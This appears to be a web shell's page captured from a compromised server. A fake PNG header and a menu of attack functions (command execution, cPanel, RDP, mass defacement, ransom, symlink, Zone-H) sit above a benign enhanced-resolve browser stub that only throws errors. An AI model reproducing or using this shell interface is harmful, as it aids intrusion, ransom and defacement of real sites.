\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /var/www/html/infraai.ai/frontend/node_modules/enhanced-resolve/lib/util/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : /var/www/html/infraai.ai/frontend/node_modules/enhanced-resolve/lib/util/graceful-fs-browser.js |
/*
MIT License http://www.opensource.org/licenses/mit-license.php
*/
"use strict";
// Browser stub for the default `graceful-fs` file system. A browser has no
// ambient file system, so the convenience entry's default resolver has nothing
// to read — pass your own `fileSystem` to `create()` /
// `ResolverFactory.createResolver()` instead. Each method throws a clear error
// if the default is actually used, while keeping the package able to bundle for
// the browser (no Node `fs` dependency is pulled in).
const message =
"enhanced-resolve: no default file system is available in the browser. " +
"Pass a `fileSystem` to `create()` or `ResolverFactory.createResolver()`.";
/**
* @returns {never} always throws
*/
const unavailable = () => {
throw new Error(message);
};
// The same set of methods `CachedInputFileSystem` reads from the file system
// (graceful-fs has no `readJson`/`readJsonSync`, so those stay undefined).
module.exports = {
lstat: unavailable,
lstatSync: unavailable,
readFile: unavailable,
readFileSync: unavailable,
readdir: unavailable,
readdirSync: unavailable,
readlink: unavailable,
readlinkSync: unavailable,
realpath: unavailable,
realpathSync: unavailable,
stat: unavailable,
statSync: unavailable,
};